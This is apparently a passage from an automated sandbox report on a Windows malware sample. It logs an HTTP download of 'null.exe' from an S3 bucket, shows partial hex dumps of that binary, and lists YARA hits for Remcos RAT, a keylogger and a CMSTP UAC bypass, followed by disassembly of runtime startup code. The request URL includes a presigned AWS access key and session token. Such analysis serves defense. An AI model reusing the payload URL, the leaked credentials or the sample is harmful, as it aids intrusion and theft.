                                                                                                                                                    Connection: close


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    1192.168.2.5497603.5.24.444431372C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-12-12 17:02:01 UTC1199OUTGET /986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGB46CDIP&Signature=OsUnoSTQrRgZD6FYZJqgppUhBLs%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIQC1qssmaZMu0Kq%2F5UE7VMx074oM1d%2BXj1uJ%2B9uNqpoePQIgFeE4zY04aoLCi5xHmh1Tg9HBeMUGDXUCT9cKr%2FT49vsqsAIIwv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDL4p3i3uRNNKPKBtsiqEAmWSN4qXnlEPekaIRewDbxqmzd738FbMSYF6yOejRX7UjKy58YjDJFsXH4LoiMqySTikefatHXwx8UawuXSw40xhPCSf6ZNVVhxIs6%2B98cEmwIvmpRC%2FOdW4sDY4BxSBIF%2F2NDDOh7bpfb7NAWS%2B9VcOTbH6Q5Odca1yZcK4sIsx90QntabTAavZ5qDYhdxdDEHOXtZ1I67Kh3cnKHUnUsfzGqjAWfoXFAT%2B6VxUzAueumFQfzwfbjwOus4ML23IBZ%2F8pc8JVhhIpJZjV04Xv2X%2BZ%2BDSSf4IIoyBBrjX%2Fp23vP%2B%2FAEHvBknm1v51J7irQC8H%2FqOcUfKjIseMSrem7rdR3R7tML2q7LoGOp0Be%2BbdUZ1VS1k%2BpYMTJXZ%2F0oOTjr23Th9wKEZGAxpdrR2zB1mn2dI1EsUc4DFBYgtG7bhYUMbmqOm68u4XRTBt5CkqTMOhF2vlWfjFIst%2FFcuh79oP5sOZM%2Bc28pWjSzS5Sb%2FRPafPW2EkE [TRUNCATED]
                                                                                                                                                    Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2024-12-12 17:02:02 UTC570INHTTP/1.1 200 OK
                                                                                                                                                    x-amz-id-2: GWbW+3Pq7gyGjHuWHk/96bSTZgazFrDdpr69Fgh3MzUK7a2JQUw2HkOHeKJ/S2ofFGefPASWe18WQV8VKFH362gw/yLQ3OBn4w+d/9/srXk=
                                                                                                                                                    x-amz-request-id: SGVRN7NY9KGM07CB
                                                                                                                                                    Date: Thu, 12 Dec 2024 17:02:03 GMT
                                                                                                                                                    Last-Modified: Thu, 12 Dec 2024 14:47:44 GMT
                                                                                                                                                    ETag: "27650afe28ba588c759ade95bf403833"
                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                    x-amz-version-id: kXXRZ1mUq75DO3FONi1exQQCVC7lCh3.
                                                                                                                                                    Content-Disposition: attachment; filename="null.exe"
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                    Content-Length: 4054528
                                                                                                                                                    Server: AmazonS3
                                                                                                                                                    Connection: close
                                                                                                                                                    2024-12-12 17:02:02 UTC16384INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                    2024-12-12 17:02:02 UTC454INData Raw: 77 0f 8d 44 24 04 50 e8 34 c7 ff ff 83 f8 00 74 71 8b 44 24 04 fc e8 c9 f5 ff ff 8b 54 24 08 6a 00 50 68 2e 4c 40 00 52 ff 15 18 c0 61 00 8b 5c 24 04 81 3b de fa ed 0e 8b 53 14 8b 43 18 74 1d 8b 15 10 c0 61 00 85 d2 0f 84 fa fe ff ff 89 d8 ff d2 85 c0 0f 84 ee fe ff ff 8b 53 0c e8 16 fb ff ff 8b 0d 04 c0 61 00 85 c9 74 02 ff d1 8b 4c 24 04 b8 d9 00 00 00 8b 51 14 89 14 24 e9 d6 03 00 00 31 c0 c3 8d 40 00 31 d2 8d 45 f4 64 8b 0a 64 89 02 89 08 c7 40 04 e8 4b 40 00 89 68 08 a3 3c c6 61 00 c3 8d 40 00 31 d2 a1 3c c6 61 00 85 c0 74 1c 64 8b 0a 39 c8 75 08 8b 00 64 89 02 c3 8b 09 83 f9 ff 74 08 39 01 75 f5 8b 00 89 01 c3 55 8b ec 53 56 57 bf 38 c6 61 00 8b 47 08 85 c0 74 48 8b 5f 0c 8b 70 04 33 d2 55 68 16 4d 40 00 64 ff 32 64 89 22 85 db 7e 12 4b 89 5f 0c 8b
                                                                                                                                                    Data Ascii: wD$P4tqD$T$jPh.L@Ra\$;SCtaSatL$Q$1@1Edd@K@h<a@1<atd9udt9uUSVW8aGtH_p3UhM@d2d"~K_
                                                                                                                                                    2024-12-12 17:02:02 UTC16384INData Raw: c0 61 00 00 e8 61 ff ff ff c3 53 31 db 57 56 8b 3c 18 8d 74 18 04 8b 46 04 8b 16 01 d8 01 da e8 ea 26 00 00 83 c6 08 4f 75 ec 5e 5f 5b c3 53 31 db 57 56 8b 3c 18 8d 74 18 04 8b 46 04 8b 16 8b 04 18 01 da e8 c5 26 00 00 83 c6 08 4f 75 eb 5e 5f 5b c3 8d 40 00 53 31 db 57 56 8b 3c 18 8d 74 18 04 8b 46 04 8b 16 8b 04 18 03 46 08 89 04 1a 83 c6 0c 4f 75 ec 5e 5f 5b c3 53 56 8b 18 8d 70 04 8b 56 04 8b 06 e8 27 0a 00 00 83 c6 08 4b 75 f0 5e 5b c3 8b c0 53 56 57 be c8 10 61 00 b1 10 8b 1d 00 10 61 00 8b c3 bf 0a 00 00 00 99 f7 ff 80 c2 30 33 c0 8a c1 88 14 06 8b c3 bb 0a 00 00 00 99 f7 fb 8b d8 49 85 db 75 db b1 1c a1 04 10 61 00 8b d0 83 e2 0f 8a 92 e8 10 61 00 33 db 8a d9 88 14 1e c1 e8 04 49 85 c0 75 e6 5f 5e 5b c3 8b c0 31 c0 87 05 00 10 61 00 f7 d8 19 c0 40
                                                                                                                                                    Data Ascii: aaS1WV<tF&Ou^_[S1WV<tF&Ou^_[@S1WV<tFFOu^_[SVpV'Ku^[SVWaa03Iuaa3Iu_^[1a@
                                                                                                                                                    2024-12-12 17:02:02 UTC1024INData Raw: 54 46 69 6c 65 4e 61 6d 65 90 d4 8d 40 00 0e 0a 54 53 65 61 72 63 68 52 65 63 58 01 00 00 01 00 00 00 c0 8d 40 00 0c 00 00 00 3c 8e 40 00 00 00 00 00 00 00 00 00 3c 8e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 8e 40 00 0c 00 00 00 5c 11 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 0e 00 00 00 00 00 01 00 00 00 08 11 40 00 04 00 00 00 09 45 78 63 65 70 74 69 6f 6e a4 8e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 8e 40 00 0c 00 00 00 f0 8d 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 06 45 41 62 6f 72 74 90 f8 8e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii: TFileName@TSearchRecX@<@<@N@\@E@E@E@E@E@PB@lB@B@@Exception@@@E@E@E@E@E@PB@lB@B@EAbort@
                                                                                                                                                    2024-12-12 17:02:02 UTC16384INData Raw: 40 00 0c 45 49 6e 74 4f 76 65 72 66 6c 6f 77 8d 40 00 24 92 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 92 40 00 10 00 00 00 bc 8f 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 0a 45 4d 61 74 68 45 72 72 6f 72 90 7c 92 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 92 40 00 10 00 00 00 d8 91 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 0a 45 49 6e 76 61 6c 69 64 4f 70 90 d4 92 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 92 40 00 10 00 00 00 d8 91 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08
                                                                                                                                                    Data Ascii: @EIntOverflow@$@$@@E@E@E@E@E@PB@lB@B@EMathError|@|@@E@E@E@E@E@PB@lB@B@EInvalidOp@@@E@E@E@E@
                                                                                                                                                    2024-12-12 17:02:02 UTC1024INData Raw: ff ff 59 e9 0e 03 00 00 55 e8 a4 f8 ff ff 59 55 e8 01 f9 ff ff 59 83 7d f4 02 7e 07 c7 45 f4 02 00 00 00 8b 45 08 50 0f b7 45 e6 8b 55 f4 e8 33 f8 ff ff 59 e9 dd 02 00 00 55 e8 73 f8 ff ff 59 83 7d f4 01 75 14 8b 45 08 50 a1 a4 c6 61 00 e8 72 fb ff ff 59 e9 bc 02 00 00 8b 45 08 50 a1 a8 c6 61 00 e8 5e fb ff ff 59 e9 a8 02 00 00 55 e8 3e f8 ff ff 59 55 e8 9b f8 ff ff 59 83 7d f4 03 7e 07 c7 45 f4 03 00 00 00 8b 45 08 50 0f b7 45 e4 8b 55 f4 e8 cd f7 ff ff 59 e9 77 02 00 00 55 e8 71 f8 ff ff 59 8b 75 fc 4e ba 1c d5 40 00 b9 05 00 00 00 8b c6 e8 fb dc ff ff 85 c0 75 28 66 83 7d ea 0c 72 03 83 c6 03 8b 45 08 50 ba 02 00 00 00 8b c6 e8 29 f7 ff ff 59 83 45 fc 04 c6 45 e2 01 e9 2f 02 00 00 ba 24 d5 40 00 b9 03 00 00 00 8b c6 e8 be dc ff ff 85 c0 75 28 66 83 7d
                                                                                                                                                    Data Ascii: YUYUY}~EEPEU3YUsY}uEParYEPa^YU>YUY}~EEPEUYwUqYuN@u(f}rEP)YEE/$@u(f}
                                                                                                                                                    2024-12-12 17:02:02 UTC1749INData Raw: ff ff 5d c2 08 00 55 8b ec ff 75 0c ff 75 08 33 d2 e8 64 ff ff ff 5d c2 08 00 55 8b ec ff 75 0c ff 75 08 92 e8 51 ff ff ff 5d c2 08 00 90 53 56 57 8b fa 8b f0 8b 1f eb 01 43 8b c6 e8 c1 7d ff ff 3b d8 7f 07 80 7c 1e ff 20 74 ed 89 1f 5f 5e 5b c3 55 8b ec 83 c4 f4 53 56 57 89 4d f8 89 55 fc 8b f8 c6 45 f7 00 8b 45 08 c6 00 00 8b 55 fc 8b c7 e8 b7 ff ff ff 8b 5d fc 8b 1b 33 f6 eb 17 8b c6 03 c0 8d 04 80 33 d2 8a 54 1f ff 66 83 ea 30 66 03 c2 8b f0 43 8b c7 e8 64 7d ff ff 3b d8 7f 11 8a 44 1f ff 04 d0 2c 0a 73 07 66 81 fe e8 03 72 cd 8b 45 fc 3b 18 7e 1d 8b c3 8b 55 fc 8b 12 2a c2 8b 55 08 88 02 8b 45 fc 89 18 8b 45 f8 66 89 30 c6 45 f7 01 8a 45 f7 5f 5e 5b 8b e5 5d c2 04 00 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b f9 8b f2 89 45 fc 33 c0 55 68
                                                                                                                                                    Data Ascii: ]Uuu3d]UuuQ]SVWC};| t_^[USVWMUEEU]33Tf0fCd};D,sfrE;~U*UEEf0EE_^[]@USVW3]E3Uh
                                                                                                                                                    2024-12-12 17:02:02 UTC9000INData Raw: d6 8a 0d 98 c6 61 00 8b c5 e8 8f fa ff ff 84 c0 74 74 8d 44 24 0c 50 8d 4c 24 0a 8b d6 8b c5 e8 59 f9 ff ff 84 c0 0f 84 03 01 00 00 8b d6 8a 0d 98 c6 61 00 8b c5 e8 62 fa ff ff 84 c0 74 47 8d 44 24 0c 50 8d 4c 24 0c 8b d6 8b c5 e8 2c f9 ff ff 84 c0 0f 84 d6 00 00 00 8b d6 8a 0d 8b c6 61 00 8b c5 e8 35 fa ff ff 84 c0 74 1a 8d 44 24 0c 50 8d 4c 24 0e 8b d6 8b c5 e8 ff f8 ff ff 84 c0 0f 84 a9 00 00 00 85 ff 7d 53 8b d6 8b 0d 9c c6 61 00 8b c5 e8 78 f9 ff ff 84 c0 75 12 8b d6 b9 dc dd 40 00 8b c5 e8 66 f9 ff ff 84 c0 74 04 33 ff eb 2a 8b d6 8b 0d a0 c6 61 00 8b c5 e8 4f f9 ff ff 84 c0 75 12 8b d6 b9 e8 dd 40 00 8b c5 e8 3d f9 ff ff 84 c0 74 05 bf 0c 00 00 00 85 ff 7c 24 66 83 7c 24 04 00 74 46 66 83 7c 24 04 0c 77 3e 66 83 7c 24 04 0c 75 07 66 c7 44 24 04 00
                                                                                                                                                    Data Ascii: attD$PL$YabtGD$PL$,a5tD$PL$}Saxu@ft3*aOu@=t|$f|$tFf|$w>f|$ufD$
                                                                                                                                                    2024-12-12 17:02:02 UTC16384INData Raw: 04 85 db 75 f3 5b c3 8b c0 53 bb 68 13 61 00 eb 10 8b 03 8b 10 89 13 ba 08 00 00 00 e8 64 28 ff ff 83 3b 00 75 eb 5b c3 90 53 68 24 00 41 00 e8 3d 7c ff ff 8b d8 85 db 74 10 68 34 00 41 00 53 e8 3c 7c ff ff a3 8c 11 61 00 83 3d 8c 11 61 00 00 75 0a b8 14 ad 40 00 a3 8c 11 61 00 5b c3 00 00 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 00 00 47 65 74 44 69 73 6b 46 72 65 65 53 70 61 63 65 45 78 41 00 ba 01 00 00 00 92 f0 0f c1 02 40 c3 ba ff ff ff ff 92 f0 0f c1 02 48 c3 87 10 89 d0 c3 8d 40 00 92 f0 0f c1 02 c3 8b c0 53 56 57 55 e8 0b 46 ff ff 8b da 8b f8 33 f6 8b 6c b7 04 33 c0 89 44 b7 04 85 ed 74 0e 8b c5 8b 6d 00 e8 b1 27 ff ff 85 ed 75 f2 46 83 fe 10 75 de 8b d3 80 e2 fc 8b c7 e8 fb 41 ff ff 84 db 7e 07 8b c7 e8 b4 45 ff ff 5d 5f 5e 5b c3 8d 40 00 55 8b
                                                                                                                                                    Data Ascii: u[Shad(;u[Sh$A=|th4AS<|a=au@a[kernel32.dllGetDiskFreeSpaceExA@H@SVWUF3l3Dtm'uFuA~E]_^[@U
                                                                                                                                                    2024-12-12 17:02:02 UTC1024INData Raw: 00 0f 95 04 24 e9 8d 02 00 00 d9 43 08 d8 1d 60 42 41 00 df e0 9e 0f 95 04 24 e9 78 02 00 00 dd 43 08 d8 1d 60 42 41 00 df e0 9e 0f 95 04 24 e9 63 02 00 00 df 6b 08 d8 1d 60 42 41 00 df e0 9e 0f 95 04 24 e9 4e 02 00 00 dd 43 08 d8 1d 60 42 41 00 df e0 9e 0f 95 04 24 e9 39 02 00 00 8b c3 e8 3c fd ff ff 88 04 24 e9 2a 02 00 00 66 83 7b 08 01 1b c0 40 88 04 24 e9 1a 02 00 00 80 7b 08 00 0f 95 04 24 e9 0d 02 00 00 80 7b 08 00 0f 95 04 24 e9 00 02 00 00 66 83 7b 08 00 0f 95 04 24 e9 f2 01 00 00 83 7b 08 00 0f 95 04 24 e9 e5 01 00 00 83 7b 0c 00 75 04 83 7b 08 00 0f 95 c0 88 04 24 e9 d0 01 00 00 8b 43 08 e8 8a fe ff ff 88 04 24 e9 c0 01 00 00 8b c3 e8 8b fd ff ff 88 04 24 e9 b1 01 00 00 8b d0 66 81 ea 00 01 74 07 66 ff ca 74 11 eb 1e 8b c3 e8 a4 fc ff ff 88 04
                                                                                                                                                    Data Ascii: $C`BA$xC`BA$ck`BA$NC`BA$9<$*f{@${${$f{${${u{$C$$ftft


                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:12:01:32
                                                                                                                                                    Start date:12/12/2024
                                                                                                                                                    Path:C:\Users\user\Desktop\4JwhvqLe8n.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\4JwhvqLe8n.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:2'652'160 bytes
                                                                                                                                                    MD5 hash:B58E300CA8077ADC4094E9044BCDBBC8
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:3
                                                                                                                                                    Start time:12:01:50
                                                                                                                                                    Start date:12/12/2024
                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                                                                                    Imagebase:0x970000
                                                                                                                                                    File size:2'141'552 bytes
                                                                                                                                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.4046933344.0000000007EC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.4047509534.00000000094D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000002.4046933344.0000000007F9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:false

                                                                                                                                                    General

                                                                                                                                                    Target ID:5
                                                                                                                                                    Start time:12:02:12
                                                                                                                                                    Start date:12/12/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:4'054'528 bytes
                                                                                                                                                    MD5 hash:27650AFE28BA588C759ADE95BF403833
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.2580957765.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000002.2860397581.00000000134A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:6
                                                                                                                                                    Start time:12:02:35
                                                                                                                                                    Start date:12/12/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\ccrdlld.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:4'054'528 bytes
                                                                                                                                                    MD5 hash:27650AFE28BA588C759ADE95BF403833
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:false

                                                                                                                                                    Disassembly

                                                                                                                                                    Reset < >

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:0.7%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:4.4%
                                                                                                                                                      Total number of Nodes:341
                                                                                                                                                      Total number of Limit Nodes:2
                                                                                                                                                      execution_graph 14569 415744 HeapSetInformation 14570 41575d 14569->14570 14571 4157a1 14570->14571 14572 4157a8 14570->14572 14601 4156fb 14571->14601 14609 41698a GetModuleHandleW 14572->14609 14575 4157ae 14576 4157b9 __RTC_Initialize 14575->14576 14577 4156fb _fast_error_exit 45 API calls 14575->14577 14634 41afac GetStartupInfoW 14576->14634 14577->14576 14580 4157d3 GetCommandLineW 14654 41c3ba GetEnvironmentStringsW 14580->14654 14584 4157e3 14660 41c30c GetModuleFileNameW 14584->14660 14586 4157ed 14587 4157f8 14586->14587 14588 417342 __amsg_exit 45 API calls 14586->14588 14664 41c0da 14587->14664 14588->14587 14591 415809 14678 417121 14591->14678 14592 417342 __amsg_exit 45 API calls 14592->14591 14594 415811 14595 417342 __amsg_exit 45 API calls 14594->14595 14596 41581c __wwincmdln 14594->14596 14595->14596 14597 41584c 14596->14597 14684 4172f8 14596->14684 14687 417324 14597->14687 14600 415851 _setvbuf 14602 415709 14601->14602 14603 41570e 14601->14603 14690 417964 14602->14690 14699 4177b5 14603->14699 14606 415716 14717 4170a0 14606->14717 14610 4169a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14609->14610 14611 41699e 14609->14611 14613 4169f1 TlsAlloc 14610->14613 14811 4166d7 14611->14811 14616 416b00 14613->14616 14617 416a3f TlsSetValue 14613->14617 14616->14575 14617->14616 14618 416a50 14617->14618 14821 4170ca 14618->14821 14623 416a98 DecodePointer 14626 416aad 14623->14626 14624 416afb 14625 4166d7 __mtterm 49 API calls 14624->14625 14625->14616 14626->14624 14627 416f56 __calloc_crt 45 API calls 14626->14627 14628 416ac3 14627->14628 14628->14624 14629 416acb DecodePointer 14628->14629 14630 416adc 14629->14630 14630->14624 14631 416ae0 14630->14631 14632 416714 __getptd_noexit 45 API calls 14631->14632 14633 416ae8 GetCurrentThreadId 14632->14633 14633->14616 14635 416f56 __calloc_crt 45 API calls 14634->14635 14643 41afca 14635->14643 14636 4157c7 14636->14580 14647 417342 14636->14647 14637 41b13f 14639 41b175 GetStdHandle 14637->14639 14641 41b1d9 SetHandleCount 14637->14641 14642 41b187 GetFileType 14637->14642 14646 41b1ad InitializeCriticalSectionAndSpinCount 14637->14646 14638 41b0bf 14638->14637 14644 41b0f6 InitializeCriticalSectionAndSpinCount 14638->14644 14645 41b0eb GetFileType 14638->14645 14639->14637 14640 416f56 __calloc_crt 45 API calls 14640->14643 14641->14636 14642->14637 14643->14636 14643->14637 14643->14638 14643->14640 14644->14636 14644->14638 14645->14638 14645->14644 14646->14636 14646->14637 14648 417964 __FF_MSGBANNER 45 API calls 14647->14648 14649 41734c 14648->14649 14650 4177b5 __NMSG_WRITE 45 API calls 14649->14650 14651 417354 14650->14651 14832 41730e 14651->14832 14655 41c3cb 14654->14655 14656 41c3cf 14654->14656 14655->14584 14657 416f11 __malloc_crt 45 API calls 14656->14657 14658 41c3f1 _memmove 14657->14658 14659 41c3f8 FreeEnvironmentStringsW 14658->14659 14659->14584 14662 41c341 _wparse_cmdline 14660->14662 14661 41c384 _wparse_cmdline 14661->14586 14662->14661 14663 416f11 __malloc_crt 45 API calls 14662->14663 14663->14661 14665 41c0f2 _wcslen 14664->14665 14669 4157fe 14664->14669 14666 416f56 __calloc_crt 45 API calls 14665->14666 14671 41c116 _wcslen 14666->14671 14667 41c16c 14668 41444c _free 45 API calls 14667->14668 14668->14669 14669->14591 14669->14592 14670 416f56 __calloc_crt 45 API calls 14670->14671 14671->14667 14671->14669 14671->14670 14672 41c192 14671->14672 14674 419c22 __NMSG_WRITE 45 API calls 14671->14674 14675 41c1a9 14671->14675 14673 41444c _free 45 API calls 14672->14673 14673->14669 14674->14671 14676 415c12 __invoke_watson 5 API calls 14675->14676 14677 41c1b5 14676->14677 14679 41712f __IsNonwritableInCurrentImage 14678->14679 14922 41cfc1 14679->14922 14681 41714d __initterm_e 14683 41716e __IsNonwritableInCurrentImage 14681->14683 14925 41386e 14681->14925 14683->14594 14685 4171b8 _doexit 45 API calls 14684->14685 14686 417309 14685->14686 14686->14597 14688 4171b8 _doexit 45 API calls 14687->14688 14689 41732f 14688->14689 14689->14600 14720 41bebb 14690->14720 14692 41796b 14693 417978 14692->14693 14695 41bebb __FF_MSGBANNER 45 API calls 14692->14695 14694 4177b5 __NMSG_WRITE 45 API calls 14693->14694 14698 41799a 14693->14698 14696 417990 14694->14696 14695->14693 14697 4177b5 __NMSG_WRITE 45 API calls 14696->14697 14697->14698 14698->14603 14700 4177d6 __NMSG_WRITE 14699->14700 14701 4178e2 14700->14701 14702 41bebb __FF_MSGBANNER 42 API calls 14700->14702 14701->14606 14703 4177f0 14702->14703 14704 417901 GetStdHandle 14703->14704 14705 